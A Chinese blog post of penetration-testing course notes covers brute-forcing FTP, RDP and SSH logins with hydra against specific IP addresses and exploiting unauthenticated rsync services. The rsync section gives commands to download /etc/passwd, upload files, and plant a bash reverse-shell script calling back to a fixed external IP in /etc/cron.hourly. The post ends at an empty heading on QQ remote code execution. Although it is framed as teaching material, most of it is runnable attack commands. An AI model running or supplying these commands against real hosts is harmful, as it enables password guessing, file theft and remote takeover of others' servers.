Day84：服务攻防-端口协议&桌面应用&QQ&WPS等RCE&hydra口令猜解&未授权检测_wps漏洞复现 rce-CSDN博客https://blog.csdn.net/qq_61553520/article/details/137119893?ops_request_misc=%257B%2522request%255Fid%2522%253A%25220E34BCAF-166A-4936-880E-B7520F213AAF%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=0E34BCAF-166A-4936-880E-B7520F213AAF&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-2-137119893-null-null.142^v100^pc_search_result_base9&utm_term=%E6%9C%8D%E5%8A%A1%E6%94%BB%E9%98%B2-%E7%AB%AF%E5%8F%A3%E5%8D%8F%E8%AE%AE%26%E6%A1%8C%E9%9D%A2%E5%BA%94%E7%94%A8%26QQ%26WPS%20%E7%AD%89%20RCE%26hydra%20%E5%8F%A3%E4%BB%A4%E7%8C%9C%E8%A7%A3%26%E6%9C%AA%E6%8E%88%E6%9D%83%20%E6%A3%80%E6%B5%8B&spm=1018.2226.3001.4187

知识点;

1、端口协议-弱口令&未授权&攻击方式等

2、桌面应用-社交类&文档类&工具类等

端口协议-口令爆破&未授权

端口参考：https://mp.weixin.qq.com/s/xp_LOUmGImrRmkPrDqxKjw

弱口令爆破

服务爆破工具：https://github.com/vanhauser-thc/thc-hydra

hydra是一个自动化的爆破工具，暴力破解弱密码，

是一个支持众多协议的爆破工具，已经集成到KaliLinux中，直接在终端打开即可

-s PORT 可通过这个参数指定非默认端口。

-l LOGIN 指定破解的用户，对特定用户破解。

-L FILE 指定用户名字典。

-p PASS 小写，指定密码破解，少用，一般是采用密码字典。

-P FILE 大写，指定密码字典。

-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。

-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。

-M FILE 指定目标列表文件一行一条。

-o FILE 指定结果输出文件。

-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。

-t TASKS 同时运行的线程数，默认为16。

-w TIME 设置最大超时的时间，单位秒，默认是30s。

-v / -V 显示详细过程。

server 目标ip

service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

FTP：文件传输协议

hydra -l test -P 10top1K.txt 47.110.53.159 ftp -V

RDP：Windows远程桌面协议

hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V

有时候目标可能会用到第三方远程控制软件(vnc、向日葵、TeamViewer等)，而不用系统本身的rdp协议。

因为这些第三方远程控制软件的控制效果要比原始的rdp协议更好，所以会出现这种情况。

SSH：Linux安全外壳协议

hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V

未授权案例(rsync)

未授权检测工具：https://github.com/xk11z/unauthorized

rsync是Linux下一款数据备份工具，支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口，如果目标开启了rsync服务，并且没有配置ACL或访问密码，我们将可以读写目标服务器文件。

判断：

rsync rsync://123.58.224.8:14601/

利用-读取文件：

rsync rsync://123.58.224.8:14601/src/

下载文件;

rsync rsync://120.27.220.186:57830/src/etc/passwd ./ (./是下载到本地的路径)

上传文件

rsync -av passwd rsync://120.27.220.186:57830/src/tmp/passwd

反弹shell

获取信息

rsync rsync://120.27.220.186:57830/src/etc/crontab /root/cron.txt

创建文件

touch shell

#!/bin/bash

/bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1

chmod +x shell

上传文件

rsync -av shell rsync://120.27.220.186:57830/src/etc/cron.hourly

等待接受反弹，需要等待比较久，因为cron.hourly 固定了每小时执行一次

其中

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly

表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令

桌面应用-QQ&WPS&Clash

QQ RCE 漏洞复现